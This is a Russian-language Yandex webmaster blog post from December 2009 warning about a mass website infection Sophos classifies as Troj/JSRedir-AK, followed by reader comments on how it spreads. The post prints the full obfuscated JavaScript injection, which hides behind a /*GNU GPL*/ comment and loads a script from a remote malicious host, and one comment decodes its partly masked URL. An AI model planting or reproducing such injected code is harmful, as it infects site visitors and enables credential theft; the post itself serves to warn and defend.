Блог Яндекса для вебмастеров

Вредоносный /*GNU GPL*/

24 декабря 2009, 18:55

В течение нескольких дней мы наблюдаем резкий рост числа сайтов, зараженных новым вирусом. Вредоносный код добавляется в файлы *.js на заражаемом сайте или просто в конец страницы. Злоумышленники пытаются замаскировать вредоносный код от веб-мастера при помощи использования комментария /*GNU GPL*/. Этот тип заражения сайтов классифицирован нашим антивирусным партнером компанией Sophos как Troj/JSRedir-AK.

Вредоносный код выглядит, например, так:

/*GNU GPL*/ try{window.onload = function(){var F1s4h5mjnzo = document.createElement('s(c&@^)r&^#i)(@p^&t^))'.replace(/#|@|&|\^|\!|\)|\(|\$/ig, ''));F1s4h5mjnzo.setAttribute('type', 'text/javascript');F1s4h5mjnzo.setAttribute('src', 'h@$!t#!!t!)$&p#:#&/@@/))#f(o(r&!$b!&e##^s!-$^!c#$&o&m).^(#m@@y#b@e@#s&&t@!y^)!#o(u((($x$!i#(.@&)@c&n@^@.(#^&s(#@i)(@@t^e(#&m&e^#$t!@e$^#r$-#c@&#o#^m^^(.@x!x^)x!x!@@x))!x(x$$@x$&x!))#l(@@x$.)&$r@($^u)!@):@^$&)8@)@0&8#$0)&/&c!l$a(&&r$i@&@n!$^.()(c(##o^#(m&$$)$/@#^c!(l)#!a)!(r$i&$)n(().$$c&^##@o(!&^m^^/^d@#@e$(@!^v#@i))&^)a(#!n)!t)@)a$r!t$(.($&c!^&o!#m)&@&/))(g)&^o^@)o)(#g&(#^l()!e!^!.)&@c)&&!o)()$!m@^/!!e@!x(@&a&@@m&i$n^@e&#(^&r)^.(c&(&o^&m(/#@)'.replace(/#|\!|\(|\$|&|\)|\^|@/ig, ''));F1s4h5mjnzo.setAttribute('defer', 'defer');F1s4h5mjnzo.setAttribute('id', 'J#(i)^#v$@@o(^@8(x!&w(^&r!&#^a$$^@e^3(^@$z#)i!)s#&#'.replace(/\(|@|\^|&|\)|\$|\!|#/ig, ''));document.body.appendChild(F1s4h5mjnzo);}} catch(e) {}

На текущий момент Яндексу известно примерно о двух тысячах сайтов, зараженных вирусом типа Troj/JSRedir-AK. Если вы заметили подобный код на вашем сайте, удалите его. Для того, чтобы своевременно получать уведомления о размещении на страницах вашего сайта вредоносного кода, советуем зарегистрировать сайт в Яндекс.Вебмастере.

UPD: Уже больше 2200.

UPD2: Уже больше 3000 (14:00 25.12.2009).


Группа пролетарского гнева компании Яндекс


P.S. Сайт ООН содержит вредоносный код другого типа :)

19 комментариев
Подписаться на комментарии к посту
Каким образом этот вирус распространяется?
Крайне интересен этот вопрос. За последние несколько дней пришлось вычистить пару десятков сайтов.
юзер, зашедший на зараженный сайт, заражается сам. с зараженного компа утекают пароли ftp доступа (если на компе таковые найдутся) + накрывается сам комп... Тем временем по украденным данным доступа уже логинится ботнет и заражает сайт...
Как вариант получая доступ к регистрационной информации веб-мастеров (если верить, что он ворует пароли с компьютеров пользователей). Или оставляя сообщения в разных гостевых, на форумах, где плохо фильтруется содержимое сообщений, оставляя в тексте JS код.
Простите, а где на ООН вирус?
Вы это узнаете, если вам удастся подтвердить права на сайт un.org в Яндекс.Вебмастере ;)
ОГО, и у меня!
Яндекс умеет довольно быстро находить, что на сайте появился вирус и извещать об этом по почте вебмастеру, но при xml поиске подобные сайты никак не помечаются, ведь так?

ps: наверное не лучший пост для вопроса, но тут его с большей вероятностью увидят)
Комментарий удалён
аргументы? факты?
Сейчас эта функция тестируется.

>>Для того, чтобы своевременно получать уведомления о размещении на страницах вашего сайта вредоносного кода, советуем зарегистрировать сайт в Яндекс.Вебмастере.


Если на моем сайте появится вирус, Вы уведомите об этом на почту или в панели вебмастера?

Сам попал под раздачу :( На 5 сайтов залило эту дрянь,благо не долго провисело.
Омг.. Скажите, а если этот код скопировать на страницу сайта, то она будет заражена?!
А у меня вообще последнее время начал глючить Вебмастер. Информация в нём уже не обновлялась давно, да и вообще что то странное с ним твориться.
http://justcoded.com/article/gumblar-family-virus-removal-tool/ - почитайте мою статью об этом вирусе. Там же есть скрипт для очистки зараженных сайтов

А как же вредоносный код может попасть на сайт в JS без ведома администратора сайта?

через недостаточную фильтрацию того, что оставляют пользователи через веб-формы

а набот этих символов типа: "!"№;%:?*()_+=" это закриптованые данные?

Но похоже и на зашифрованный простым алгоритмом текст ссылки для поля src например, мусорные символы вырезаются и остаётся вполне логичный текст ссылки.

'h@$!t#!!t!)$&p#:#&/@@/))#f(o(r&!$b!&e##^s!-$^!c#$&o&m).^(#m@@y#b@e@#s&&t@!y^)!#o(u((($x$!i#(.@&)@c&n@^@.(#^&s(#@i)(@@t^e(#&m&e^#$t!@e$^#r$-#c@@&#o#^m^^(.@x!x^)x!x!@@x))!x(x$$@x$&x!))#l(@@x$.)&$r@($^u)!@):@^$&)8@)@0&8#$0)&/&c!l$a(&&r$i@&@n!$^.()(c(##o^#(m&$$)$/@#^c!(l)#!a)!(r$i&$)n(().$$c&^##@o(!&^m^^/^d@#@e$(@!^v#@i))&^)a(#!n)!t)@)a$r!t$(.($&c!^&o!#m)&@&/))(g)&^o^@)o)(#g&(#^l()!e!^!.)&@c)&&!o)()$!m@^/!!e@!x(@&a&@@m&i$n^@e>&#(^&r)^.(c&(&o^&m(/#@)'

.replace(/#|\!|\(|\$|&|\)|\^|@/ig, ''))

Строка с мусором из которой следом же ряд символов удаляется и остаётся
"http://forbes-com.mybestyouxi.cn.sitemeter-com.xxxxxxxxxlx.ru:8080/clarin.com/clarin.com/deviantart.com/google.com/examiner.com/"